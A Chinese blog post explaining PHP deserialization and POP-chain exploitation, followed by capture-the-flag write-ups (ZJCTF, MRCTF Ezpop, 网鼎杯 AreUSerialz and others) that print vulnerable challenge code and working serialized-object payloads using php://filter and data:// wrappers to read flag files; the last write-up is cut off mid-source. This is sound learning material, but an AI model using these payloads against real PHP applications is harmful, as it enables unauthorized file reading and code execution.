<!DOCTYPE HTML>
<html lang="zh-CN">


<head>
    <meta charset="utf-8">
    <meta name="keywords" content="反序列化, Ethe&#39;s blog">
    <meta name="description" content="基础知识php的序列化和反序列化主要是通过serialize和unserialize两个函数
serialize()将一个对象转换成一个字符串，unserialize()将字符串还原为一个对象，对反序列化进行利用也主要是通过其中的魔术方法
">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=no">
    <meta name="renderer" content="webkit|ie-stand|ie-comp">
    <meta name="mobile-web-app-capable" content="yes">
    <meta name="format-detection" content="telephone=no">
    <meta name="apple-mobile-web-app-capable" content="yes">
    <meta name="apple-mobile-web-app-status-bar-style" content="black-translucent">
    <meta name="referrer" content="no-referrer-when-downgrade">
    <!-- Global site tag (gtag.js) - Google Analytics -->


    <title>反序列化 | Ethe&#39;s blog</title>
    <link rel="icon" type="image/png" href="https://epicture.oss-cn-beijing.aliyuncs.com/favicon.png">

    <link rel="stylesheet" type="text/css" href="/libs/awesome/css/all.min.css">
    <link rel="stylesheet" type="text/css" href="https://epicture.oss-cn-beijing.aliyuncs.com/libs/materialize/materialize.min.css">
    <link rel="stylesheet" type="text/css" href="https://epicture.oss-cn-beijing.aliyuncs.com/libs/aos/aos.css">
    <link rel="stylesheet" type="text/css" href="https://epicture.oss-cn-beijing.aliyuncs.com/libs/animate/animate.min.css">
    <link rel="stylesheet" type="text/css" href="https://epicture.oss-cn-beijing.aliyuncs.com/libs/lightGallery/css/lightgallery.min.css">
    <link rel="stylesheet" type="text/css" href="https://epicture.oss-cn-beijing.aliyuncs.com/css/matery.css">
    <link rel="stylesheet" type="text/css" href="https://epicture.oss-cn-beijing.aliyuncs.com/css/my.css">

    <script src="https://epicture.oss-cn-beijing.aliyuncs.com/libs/jquery/jquery-3.6.0.min.js"></script>
    <script src="https://sdk.jinrishici.com/v2/browser/jinrishici.js" charset="utf-8"></script>

<meta name="generator" content="Hexo 5.4.0"><link rel="stylesheet" href="/css/prism-tomorrow.css" type="text/css">
<link rel="stylesheet" href="/css/prism-line-numbers.css" type="text/css"></head>



   <style>
    body{
       background-image: url(https://cdn.jsdelivr.net/gh/Tokisaki-Galaxy/res/site/medias/background.jpg);
       background-repeat:no-repeat;
       background-size: cover;
       background-attachment:fixed;
    }
</style>



<body>
    <header class="navbar-fixed">
    <nav id="headNav" class="bg-color nav-transparent">
        <div id="navContainer" class="nav-wrapper container">
            <div class="brand-logo">
                <a href="/" class="waves-effect waves-light">
                    
                    <img src="https://epicture.oss-cn-beijing.aliyuncs.com/medias/logo.png" class="logo-img" alt="LOGO">
                    
                    <span class="logo-span">Ethe&#39;s blog</span>
                </a>
            </div>
            

<a href="#" data-target="mobile-nav" class="sidenav-trigger button-collapse"><i class="fas fa-bars"></i></a>
<ul class="right nav-menu">
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/" class="waves-effect waves-light">
      
      <i class="fas fa-home" style="zoom: 0.6;"></i>
      
      <span>首页</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/tags" class="waves-effect waves-light">
      
      <i class="fas fa-tags" style="zoom: 0.6;"></i>
      
      <span>标签</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/categories" class="waves-effect waves-light">
      
      <i class="fas fa-bookmark" style="zoom: 0.6;"></i>
      
      <span>分类</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/archives" class="waves-effect waves-light">
      
      <i class="fas fa-archive" style="zoom: 0.6;"></i>
      
      <span>归档</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/about" class="waves-effect waves-light">
      
      <i class="fas fa-user-circle" style="zoom: 0.6;"></i>
      
      <span>关于</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/contact" class="waves-effect waves-light">
      
      <i class="fas fa-comments" style="zoom: 0.6;"></i>
      
      <span>留言板</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/friends" class="waves-effect waves-light">
      
      <i class="fas fa-address-book" style="zoom: 0.6;"></i>
      
      <span>友情链接</span>
    </a>
    
  </li>
  
  <li>
    <a href="#searchModal" class="modal-trigger waves-effect waves-light">
      <i id="searchIcon" class="fas fa-search" title="搜索" style="zoom: 0.85;"></i>
    </a>
  </li>
</ul>


<div id="mobile-nav" class="side-nav sidenav">

    <div class="mobile-head bg-color">
        
        <img src="https://epicture.oss-cn-beijing.aliyuncs.com/medias/logo.png" class="logo-img circle responsive-img">
        
        <div class="logo-name">Ethe&#39;s blog</div>
        <div class="logo-desc">
            
            Never really desperate, only the lost of the soul.
            
        </div>
    </div>

    <ul class="menu-list mobile-menu-list">
        
        <li class="m-nav-item">
	  
		<a href="/" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-home"></i>
			
			首页
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/tags" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-tags"></i>
			
			标签
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/categories" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-bookmark"></i>
			
			分类
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/archives" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-archive"></i>
			
			归档
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/about" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-user-circle"></i>
			
			关于
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/contact" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-comments"></i>
			
			留言板
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/friends" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-address-book"></i>
			
			友情链接
		</a>
          
        </li>
        
        
        <li><div class="divider"></div></li>
        <li>
            <a href="https://github.com/blinkfox/hexo-theme-matery" class="waves-effect waves-light" target="_blank">
                <i class="fab fa-github-square fa-fw"></i>Fork Me
            </a>
        </li>
        
    </ul>
</div>


        </div>

        
            <style>
    .nav-transparent .github-corner {
        display: none !important;
    }

    .github-corner {
        position: absolute;
        z-index: 10;
        top: 0;
        right: 0;
        border: 0;
        transform: scale(1.1);
    }

    .github-corner svg {
        color: #0f9d58;
        fill: #fff;
        height: 64px;
        width: 64px;
    }

    .github-corner:hover .octo-arm {
        animation: a 0.56s ease-in-out;
    }

    .github-corner .octo-arm {
        animation: none;
    }

    @keyframes a {
        0%,
        to {
            transform: rotate(0);
        }
        20%,
        60% {
            transform: rotate(-25deg);
        }
        40%,
        80% {
            transform: rotate(10deg);
        }
    }
</style>

<a href="https://github.com/blinkfox/hexo-theme-matery" class="github-corner tooltipped hide-on-med-and-down" target="_blank"
   data-tooltip="Fork Me" data-position="left" data-delay="50">
    <svg viewBox="0 0 250 250" aria-hidden="true">
        <path d="M0,0 L115,115 L130,115 L142,142 L250,250 L250,0 Z"></path>
        <path d="M128.3,109.0 C113.8,99.7 119.0,89.6 119.0,89.6 C122.0,82.7 120.5,78.6 120.5,78.6 C119.2,72.0 123.4,76.3 123.4,76.3 C127.3,80.9 125.5,87.3 125.5,87.3 C122.9,97.6 130.6,101.9 134.4,103.2"
              fill="currentColor" style="transform-origin: 130px 106px;" class="octo-arm"></path>
        <path d="M115.0,115.0 C114.9,115.1 118.7,116.5 119.8,115.4 L133.7,101.6 C136.9,99.2 139.9,98.4 142.2,98.6 C133.8,88.0 127.5,74.4 143.8,58.0 C148.5,53.4 154.0,51.2 159.7,51.0 C160.3,49.4 163.2,43.6 171.4,40.1 C171.4,40.1 176.1,42.5 178.8,56.2 C183.1,58.6 187.2,61.8 190.9,65.4 C194.5,69.0 197.7,73.2 200.1,77.6 C213.8,80.2 216.3,84.9 216.3,84.9 C212.7,93.1 206.9,96.0 205.4,96.6 C205.1,102.4 203.0,107.8 198.3,112.5 C181.9,128.9 168.3,122.5 157.7,114.1 C157.9,116.9 156.7,120.9 152.7,124.9 L141.0,136.5 C139.8,137.7 141.6,141.9 141.8,141.8 Z"
              fill="currentColor" class="octo-body"></path>
    </svg>
</a>
        
    </nav>

</header>

    



<div class="bg-cover pd-header post-cover" style="background-image: url('https://epicture.oss-cn-beijing.aliyuncs.com/medias/featureimages/10.jpg')">
    <div class="container" style="right: 0px;left: 0px;">
        <div class="row">
            <div class="col s12 m12 l12">
                <div class="brand">
                    <h1 class="description center-align post-title">反序列化</h1>
                </div>
            </div>
        </div>
    </div>
</div>




<main class="post-container content">

    
    <link rel="stylesheet" href="https://epicture.oss-cn-beijing.aliyuncs.com/libs/tocbot/tocbot.css">
<style>
    #articleContent h1::before,
    #articleContent h2::before,
    #articleContent h3::before,
    #articleContent h4::before,
    #articleContent h5::before,
    #articleContent h6::before {
        display: block;
        content: " ";
        height: 100px;
        margin-top: -100px;
        visibility: hidden;
    }

    #articleContent :focus {
        outline: none;
    }

    .toc-fixed {
        position: fixed;
        top: 64px;
    }

    .toc-widget {
        width: 345px;
        padding-left: 20px;
    }

    .toc-widget .toc-title {
        padding: 35px 0 15px 17px;
        font-size: 1.5rem;
        font-weight: bold;
        line-height: 1.5rem;
    }

    .toc-widget ol {
        padding: 0;
        list-style: none;
    }

    #toc-content {
        height: calc(100vh - 250px);
        overflow: scroll;
    }

    #toc-content ol {
        padding-left: 10px;
    }

    #toc-content ol li {
        padding-left: 10px;
    }

    #toc-content .toc-link:hover {
        color: #42b983;
        font-weight: 700;
        text-decoration: underline;
    }

    #toc-content .toc-link::before {
        background-color: transparent;
        max-height: 25px;

        position: absolute;
        right: 23.5vw;
        display: block;
    }

    #toc-content .is-active-link {
        color: #42b983;
    }

    #toc-content .is-active-link {
        color: #42b983;
    }
    #toc-content .is-active-link::before {
        background-color: #42b983;
    }
    #floating-toc-btn {
        position: fixed;
        right: 15px;
        bottom: 76px;
        padding-top: 15px;
        margin-bottom: 0;
        z-index: 998;
    }
    #floating-toc-btn {
        position: fixed;
        right: 15px;
        bottom: 76px;
        padding-top: 15px;
        margin-bottom: 0;
        z-index: 998;
    }

    #floating-toc-btn .btn-floating {
        width: 48px;
        height: 48px;
    }

    #floating-toc-btn .btn-floating i {
        line-height: 48px;
        font-size: 1.4rem;
    }
</style>
<div class="row">
    <div id="main-content" class="col s12 m12 l9">
        <!-- 文章内容详情 -->
<div id="artDetail">
    <div class="card">
        <div class="card-content article-info">
            <div class="row tag-cate">
                <div class="col s7">
                    
                    <div class="article-tag">
                        
                            <a href="/tags/web%E5%AD%A6%E4%B9%A0/">
                                <span class="chip bg-color">web学习</span>
                            </a>
                        
                            <a href="/tags/%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/">
                                <span class="chip bg-color">反序列化</span>
                            </a>
                        
                    </div>
                    
                </div>
                <div class="col s5 right-align">
                    
                </div>
            </div>

            <div class="post-info">
                
                <div class="post-date info-break-policy">
                    <i class="far fa-calendar-minus fa-fw"></i>发布日期:&nbsp;&nbsp;
                    2021-06-30
                </div>
                

                
                <div class="post-date info-break-policy">
                    <i class="far fa-calendar-check fa-fw"></i>更新日期:&nbsp;&nbsp;
                    2022-10-28
                </div>
                

                
                <div class="info-break-policy">
                    <i class="far fa-file-word fa-fw"></i>文章字数:&nbsp;&nbsp;
                    6.4k
                </div>
                

                
                <div class="info-break-policy">
                    <i class="far fa-clock fa-fw"></i>阅读时长:&nbsp;&nbsp;
                    31 分
                </div>
                

                
                    <div id="busuanzi_container_page_pv" class="info-break-policy">
                        <i class="far fa-eye fa-fw"></i>阅读次数:&nbsp;&nbsp;
                        <span id="busuanzi_value_page_pv"></span>
                    </div>
				
            </div>
        </div>
        <hr class="clearfix">

        
        <!-- 是否加载使用自带的 prismjs. -->
        <link rel="stylesheet" href="https://epicture.oss-cn-beijing.aliyuncs.com/libs/prism/prism.css">
        

        

        <div class="card-content article-card-content">
            <div id="articleContent">
                <h3 id="基础知识"><a href="#基础知识" class="headerlink" title="基础知识"></a>基础知识</h3><p>php的序列化和反序列化主要是通过serialize和unserialize两个函数</p>
<p>serialize()将一个对象转换成一个字符串，unserialize()将字符串还原为一个对象，对反序列化进行利用也主要是通过其中的魔术方法</p>
 <span id="more"></span>

<p>几个常见的魔术方法</p>
<pre class="language-none"><code class="language-none">__construct： 在创建对象时候初始化对象，一般用于对变量赋初值。
__destruct： 和构造函数相反，当对象所在函数调用完毕后执行。
__toString：当对象被当做一个字符串使用时调用。
__sleep:序列化对象之前就调用此方法(其返回需要一个数组)
__wakeup:反序列化恢复对象之前调用该方法
__call:当调用对象中不存在的方法会自动调用该方法。
__get:在调用b私有属性的时候会自动执行
__isset()在不可访问的属性上调用isset()或empty()触发
__invoke()	当尝试把对象当方法调用时调用。
__unset()在不可访问的属性上使用unset()时触发</code></pre>

<p>格式</p>
<pre class="language-none"><code class="language-none">O:4:&quot;Test&quot;:2:&#123;s:1:&quot;a&quot;;s:5:&quot;Hello&quot;;s:1:&quot;b&quot;;i:20;&#125;
类型:长度:&quot;名字&quot;:类中变量的个数:&#123;类型:长度:&quot;名字&quot;;类型:长度:&quot;值&quot;;......&#125;</code></pre>

<p>序列化字符串中表示对象属性个数的值大于真实的属性个数时会跳过__wakeup的执行</p>
<p>private类型有隐藏的空格符</p>
<p><strong>反序列化的常见起点</strong></p>
<p>__wakeup 一定会调用</p>
<p>__destruct 一定会调用</p>
<p>__toString 当一个对象被反序列化后又被当做字符串使用</p>
<p><strong>反序列化的常见中间跳板:</strong></p>
<p>__toString 当一个对象被当做字符串使用<br>__get 读取不可访问或不存在属性时被调用<br>__set 当给不可访问或不存在属性赋值时被调用<br>__isset 对不可访问或不存在的属性调用isset()或empty()时被调用。形如 $this-&gt;$func();</p>
<p><strong>反序列化的常见终点:</strong></p>
<p>__call 调用不可访问或不存在的方法时被调用<br>call_user_func 一般php代码执行都会选择这里<br>call_user_func_array 一般php代码执行都会选择这里</p>
<h3 id="POP链简介"><a href="#POP链简介" class="headerlink" title="POP链简介"></a><strong>POP链简介</strong></h3><p>借鉴的文章：</p>
<p><a target="_blank" rel="noopener" href="https://www.jianshu.com/p/16c56bebc63d">php反序列化利用——POP链构造实例 - 简书 (jianshu.com)</a></p>
<p><a target="_blank" rel="noopener" href="https://blog.csdn.net/qq_43431158/article/details/105265462">(1条消息) PHP反序列化—构造POP链_Lemon&#39;s blog-CSDN博客_php反序列化pop链</a></p>
<p>POP 面向属性编程(Property-Oriented Programing) 常用于上层语言构造特定调用链的方法，与二进制利用中的面向返回编程（Return-Oriented Programing）的原理相似，都是从现有运行环境中寻找一系列的代码或者指令调用，然后根据需求构成一组连续的调用链,最终达到攻击者邪恶的目的。类似于PWN中的ROP，有时候反序列化一个对象时，由它调用的__wakeup()中又去调用了其他的对象，由此可以溯源而上，利用一次次的“gadget”找到漏洞点。</p>
<h3 id="POP链利用技巧"><a href="#POP链利用技巧" class="headerlink" title="POP链利用技巧"></a>POP链利用技巧</h3><p>1、一些有用的POP链中出现的方法：</p>
<pre class="language-php" data-language="php"><code class="language-php">- 命令执行：exec()、passthru()、popen()、system()
- 文件操作：file_put_contents()、file_get_contents()、unlink()</code></pre>

<p>2、<strong>反序列化中为了避免信息丢失，使用大写S支持字符串的编码。</strong>PHP 为了更加方便进行反序列化 Payload 的 传输与显示(避免丢失某些控制字符等信息)，我们可以在序列化内容中用大写S表示字符串，此时这 个字符串就支持将后面的字符串用16进制表示，使用如下形式即可绕过，即：</p>
<pre class="language-css" data-language="css"><code class="language-css"><span class="token property">s</span><span class="token punctuation">:</span>4<span class="token punctuation">:</span><span class="token string">"user"</span><span class="token punctuation">;</span> -> <span class="token property">S</span><span class="token punctuation">:</span>4<span class="token punctuation">:</span><span class="token string">"use\72"</span><span class="token punctuation">;</span></code></pre>

<p>3、深浅copy：在 php中如果我们使用 &amp; 对变量A的值指向变量B，这个时候是属于浅拷贝，当变量B改变时，变量A也会跟着改变。在被反序列化的对象的某些变量被过滤了，但是其他变量可控的情况下，就可以利用浅拷贝来绕过过滤。<br> 4、配合PHP伪协议实现文件包含、命令执行等漏洞。</p>
<h1 id="wp"><a href="#wp" class="headerlink" title="wp"></a>wp</h1><p>(这里放一下自己做过的反序列化题，持续更新.jpg</p>
<h2 id="ZJCTF-2019-NiZhuanSiWei"><a href="#ZJCTF-2019-NiZhuanSiWei" class="headerlink" title="[ZJCTF 2019]NiZhuanSiWei"></a>[ZJCTF 2019]NiZhuanSiWei</h2><p><img src="https://epicture.oss-cn-beijing.aliyuncs.com/img/%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/image-20210501204543745.png" alt="image-20210501204543745"></p>
<p>看见file_get_contents(),利用伪协议data://text/plain;base64绕过</p>
<p>再利用php://filter读取useless内的内容</p>
<p>解码后</p>
<p><img src="https://epicture.oss-cn-beijing.aliyuncs.com/img/%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/image-20210501183046395.png" alt="image-20210501183046395"></p>
<p>可知flag在flag.php中</p>
<p>试图让file=flag.php</p>
<p>看到unserialize函数，利用php反序列化</p>
<p>构造payload</p>
<p>？text=data://text/plain;base64,d2VsY29tZSB0byB0aGUgempjdGY=&amp;file=useless.php&amp;password=O:4:&quot;Flag&quot;:1:{s:4:&quot;file&quot;;s:8:&quot;flag.php&quot;;}</p>
<p><img src="https://epicture.oss-cn-beijing.aliyuncs.com/img/%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/image-20210501205224647.png" alt="image-20210501205224647"></p>
<p>查看源码找到flag</p>
<p><img src="https://epicture.oss-cn-beijing.aliyuncs.com/img/%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/image-20210501205239104.png" alt="image-20210501205239104"></p>
<h2 id="极客大挑战-2019-PHP"><a href="#极客大挑战-2019-PHP" class="headerlink" title="[极客大挑战 2019]PHP"></a>[极客大挑战 2019]PHP</h2><p>页面中提示有备份文件，御剑扫一遍</p>
<p>找到存在<a target="_blank" rel="noopener" href="http://www.zip/">www.zip</a></p>
<p><img src="https://epicture.oss-cn-beijing.aliyuncs.com/img/%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/image-20210501220739803.png" alt="image-20210501220739803"></p>
<p>重点在class.php和index.php中</p>
<p><img src="https://epicture.oss-cn-beijing.aliyuncs.com/img/%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/image-20210501220822144.png" alt="image-20210501220309908"></p>
<p><img src="https://epicture.oss-cn-beijing.aliyuncs.com/img/%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/image-20210501220857753.png" alt="image-20210501220857753"></p>
<p>所以要传入一个select参数，利用反序列化让username=admin</p>
<p>password=100</p>
<p>因为username和password两个为private类型</p>
<p>所以有隐藏的空格符</p>
<p>select=O:4:&quot;Name&quot;:3:{s:14:&quot;%00Name%00username&quot;;s:5:&quot;admin&quot;;s:14:&quot;%00Name%00password&quot;;s:3:&quot;100&quot;;}&quot;</p>
<p><img src="https://epicture.oss-cn-beijing.aliyuncs.com/img/%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/image-20210501220212731.png" alt="image-20210501220212731"></p>
<h2 id="MRCTF2020-Ezpop"><a href="#MRCTF2020-Ezpop" class="headerlink" title="[MRCTF2020]Ezpop"></a>[MRCTF2020]Ezpop</h2><p>题目源码</p>
<pre class="language-php" data-language="php"><code class="language-php">class Modifier &#123;
    protected  $var;
    public function append($value)&#123;
        include($value);
    &#125;
    public function __invoke()&#123;
        $this-&gt;append($this-&gt;var);
    &#125;
&#125;

class Show&#123;
    public $source;
    public $str;
    public function __construct($file&#x3D;&#39;index.php&#39;)&#123;
        $this-&gt;source &#x3D; $file;
        echo &#39;Welcome to &#39;.$this-&gt;source.&quot;&lt;br&gt;&quot;;
    &#125;
    public function __toString()&#123;
        return $this-&gt;str-&gt;source;
    &#125;

    public function __wakeup()&#123;
        if(preg_match(&quot;&#x2F;gopher|http|file|ftp|https|dict|\.\.&#x2F;i&quot;, $this-&gt;source)) &#123;
            echo &quot;hacker&quot;;
            $this-&gt;source &#x3D; &quot;index.php&quot;;
        &#125;
    &#125;
&#125;

class Test&#123;
    public $p;
    public function __construct()&#123;
        $this-&gt;p &#x3D; array();
    &#125;

    public function __get($key)&#123;
        $function &#x3D; $this-&gt;p;
        return $function();
    &#125;
&#125;

if(isset($_GET[&#39;pop&#39;]))&#123;
    @unserialize($_GET[&#39;pop&#39;]);
&#125;
else&#123;
    $a&#x3D;new Show;
    highlight_file(__FILE__);
&#125;</code></pre>

<p>题目里出现的魔术变量</p>
<pre class="language-none"><code class="language-none">__construct   当一个对象创建时被调用，
__toString   当一个对象被当作一个字符串被调用。
__wakeup()   使用unserialize时触发
__get()    用于从不可访问的属性读取数据
#难以访问包括：（1）私有属性，（2）没有初始化的属性
__invoke()   当脚本尝试将对象调用为函数时触发</code></pre>

<p>这里可以看出来首先要get进一个pop值，并进行反序列化，所以就会调用__wakeup()这个方法_</p>
<p>__<em>wakeup()中里利用preg_match对传入的值进行过滤，但如果this-&gt;source是show类，就会调用</em>__toString</p>
<p>这里会返回$this-&gt;str-&gt;source，但如果没有source这个属性，接下来就会调用__get()，然后会将对象调用为函数，</p>
<p><em>这里也就会触发</em>__invoke()，进而调用append</p>
<p>在append的中存在include，所以可以利用文件包含漏洞读到flag</p>
<p><img src="https://epicture.oss-cn-beijing.aliyuncs.com/img/%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/image-20210704003613462.png" alt="image-20210704003613462"></p>
<p>payload</p>
<p>（自己写一个还是有点困难</p>
<pre class="language-php" data-language="php"><code class="language-php">&lt;?php

class Modifier
&#123;
    protected $var &#x3D; &#39;php:&#x2F;&#x2F;filter&#x2F;read&#x3D;convert.base64-encode&#x2F;resource&#x3D;flag.php&#39;;

&#125;

class Show
&#123;
    public $source;
    public $str;

    public function __construct($file)
    &#123;
        $this-&gt;source &#x3D; $file;
    &#125;

&#125;

class Test
&#123;
    public $p;
&#125;

$a &#x3D; new Show(&#39;aaa&#39;);
$a-&gt;str &#x3D; new Test();
$a-&gt;str-&gt;p &#x3D; new Modifier();
$b &#x3D; new Show($a);
echo urlencode(serialize($b));</code></pre>

<p>base64解码拿到flag</p>
<p><img src="https://epicture.oss-cn-beijing.aliyuncs.com/img/%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/image-20210704003713873.png" alt="image-20210704003713873"></p>
<h2 id="CODE-REVIEW"><a href="#CODE-REVIEW" class="headerlink" title="CODE REVIEW"></a>CODE REVIEW</h2><p><img src="https://epicture.oss-cn-beijing.aliyuncs.com/img/%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/image-20210705135850186.png" alt="image-20210705135850186"></p>
<p>代码审计可以看出这里首先要先get进pleaseget=1然后post进pleasepost，md51，md52和obj四个值，而obj这里存在反序列化的漏洞</p>
<p>且当if($this-&gt;correct === $this-&gt;input)成立时就会打印出flag</p>
<p>这里同时要求传入的md51和md52的md5值相等，且自身不相等，由于md5不能处理数组，所以传入数组的返回值都为null</p>
<p>而因为$this-&gt;correct这里进行了编码，所以要使if语句成立在构造payload时可以采用引用赋值的方法</p>
<p>构造payload</p>
<p><img src="https://epicture.oss-cn-beijing.aliyuncs.com/img/%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/image-20210705141338826.png" alt="image-20210705141338826"></p>
<p>//uniqid() :函数基于以微秒计的当前时间，生成一个唯一的 ID。</p>
<p>//传值赋值：变量默认总是传值赋值。那也就是说，当将一个表达式的值赋予一个变量时，整个原始表达式的值被赋值到目标变量。这意味着，例如，当一个变量的值赋予另外一个变量时，改变其中一个变量的值，将不会影响到另外一个变量。</p>
<p>//引用赋值：PHP 也提供了另外一种方式给变量赋值：引用赋值。这意味着新的变量简单的引用（换言之，“成为其别名” 或者 “指向”）了原始变量。改动新的变量将影响到原始变量，反之亦然。</p>
<p>所以最终payload为</p>
<p>get内容为：?pleaseget=1</p>
<p>post内容为：pleasepost=2&amp;md51[]=1&amp;md52[]=2&amp;obj=O:3:&quot;BUU&quot;:2:{s:7:&quot;correct&quot;;s:0:&quot;&quot;;s:5:&quot;input&quot;;R:2;}</p>
<p>拿到flag</p>
<p><img src="https://epicture.oss-cn-beijing.aliyuncs.com/img/%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/image-20210705141616910.png" alt="image-20210705141616910"></p>
<h2 id="网鼎杯-2020-青龙组-AreUSerialz"><a href="#网鼎杯-2020-青龙组-AreUSerialz" class="headerlink" title="[网鼎杯 2020 青龙组]AreUSerialz"></a>[网鼎杯 2020 青龙组]AreUSerialz</h2><p>源码</p>
<pre class="language-php" data-language="php"><code class="language-php">&lt;?php

include(&quot;flag.php&quot;);

highlight_file(__FILE__);

class FileHandler &#123;

    protected $op;
    protected $filename;
    protected $content;

    function __construct() &#123;
        $op &#x3D; &quot;1&quot;;
        $filename &#x3D; &quot;&#x2F;tmp&#x2F;tmpfile&quot;;
        $content &#x3D; &quot;Hello World!&quot;;
        $this-&gt;process();
    &#125;

    public function process() &#123;
        if($this-&gt;op &#x3D;&#x3D; &quot;1&quot;) &#123;
            $this-&gt;write();
        &#125; else if($this-&gt;op &#x3D;&#x3D; &quot;2&quot;) &#123;
            $res &#x3D; $this-&gt;read();
            $this-&gt;output($res);
        &#125; else &#123;
            $this-&gt;output(&quot;Bad Hacker!&quot;);
        &#125;
    &#125;

    private function write() &#123;
        if(isset($this-&gt;filename) &amp;&amp; isset($this-&gt;content)) &#123;
            if(strlen((string)$this-&gt;content) &gt; 100) &#123;
                $this-&gt;output(&quot;Too long!&quot;);
                die();
            &#125;
            $res &#x3D; file_put_contents($this-&gt;filename, $this-&gt;content);
            if($res) $this-&gt;output(&quot;Successful!&quot;);
            else $this-&gt;output(&quot;Failed!&quot;);
        &#125; else &#123;
            $this-&gt;output(&quot;Failed!&quot;);
        &#125;
    &#125;

    private function read() &#123;
        $res &#x3D; &quot;&quot;;
        if(isset($this-&gt;filename)) &#123;
            $res &#x3D; file_get_contents($this-&gt;filename);
        &#125;
        return $res;
    &#125;

    private function output($s) &#123;
        echo &quot;[Result]: &lt;br&gt;&quot;;
        echo $s;
    &#125;

    function __destruct() &#123;
        if($this-&gt;op &#x3D;&#x3D;&#x3D; &quot;2&quot;)
            $this-&gt;op &#x3D; &quot;1&quot;;
        $this-&gt;content &#x3D; &quot;&quot;;
        $this-&gt;process();
    &#125;

&#125;

function is_valid($s) &#123;
    for($i &#x3D; 0; $i &lt; strlen($s); $i++)
        if(!(ord($s[$i]) &gt;&#x3D; 32 &amp;&amp; ord($s[$i]) &lt;&#x3D; 125))
            return false;
    return true;
&#125;

if(isset($_GET&#123;&#39;str&#39;&#125;)) &#123;

    $str &#x3D; (string)$_GET[&#39;str&#39;];
    if(is_valid($str)) &#123;
        $obj &#x3D; unserialize($str);
    &#125;

&#125;</code></pre>

<p>看到unserialize可以很容易想到反序列化，源码里还有file_get_contents，所以猜测这题是利用反序列化通过文件包含读取flag，利用php://filter来造成任意文件读取</p>
<p>在传入后还存在一个is__valid()函数的过滤，要求传入内容的ascii码在32到123之内</p>
<p>之后进行反序列化，由于要利用file_get_contents()读取flag，并将其打印出来，所以需要让op=2，执行read()中的内容</p>
<p>构造payload</p>
<p><img src="https://epicture.oss-cn-beijing.aliyuncs.com/img/%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/image-20210705150325057.png" alt="image-20210705150325057"></p>
<p>这里因为protect进行反序列化时会出现特殊符号，导致无法通过is__valid函数的过滤，可以利用对于PHP版本7.1+，对属性的类型不敏感，我们可以将protected类型改为public，以消除不可打印字符。</p>
<pre class="language-php" data-language="php"><code class="language-php">?str&#x3D;O:11:&quot;FileHandler&quot;:3:&#123;s:2:&quot;op&quot;;i:2;s:8:&quot;filename&quot;;s:57:&quot;php:&#x2F;&#x2F;filter&#x2F;read&#x3D;convert.base64-encode&#x2F;resource&#x3D;flag.php&quot;;s:7:&quot;content&quot;;N;&#125;</code></pre>

<p>（刚开始给op赋了个字符型的“2”，找错找了半天。。。</p>
<p>拿到flag</p>
<p><img src="https://epicture.oss-cn-beijing.aliyuncs.com/img/%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/image-20210705150240715.png" alt="image-20210705150240715"></p>
<p>接下来base64解码就可以拿到flag了</p>
<p><img src="https://epicture.oss-cn-beijing.aliyuncs.com/img/%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/image-20210705150647307.png" alt="image-20210705150647307"></p>
<h2 id="安洵杯-2019-easy-serialize-php"><a href="#安洵杯-2019-easy-serialize-php" class="headerlink" title="[安洵杯 2019]easy_serialize_php"></a>[安洵杯 2019]easy_serialize_php</h2><p>代码审计</p>
<pre class="language-php" data-language="php"><code class="language-php">&lt;?php

$function &#x3D; @$_GET[&#39;f&#39;];

function filter($img)&#123;
  $filter_arr &#x3D; array(&#39;php&#39;,&#39;flag&#39;,&#39;php5&#39;,&#39;php4&#39;,&#39;fl1g&#39;);
  $filter &#x3D; &#39;&#x2F;&#39;.implode(&#39;|&#39;,$filter_arr).&#39;&#x2F;i&#39;;
  return preg_replace($filter,&#39;&#39;,$img);
&#125;


if($_SESSION)&#123;
  unset($_SESSION);
&#125;

$_SESSION[&quot;user&quot;] &#x3D; &#39;guest&#39;;
$_SESSION[&#39;function&#39;] &#x3D; $function;

extract($_POST);

if(!$function)&#123;
  echo &#39;&lt;a href&#x3D;&quot;index.php?f&#x3D;highlight_file&quot;&gt;source_code&lt;&#x2F;a&gt;&#39;;
&#125;

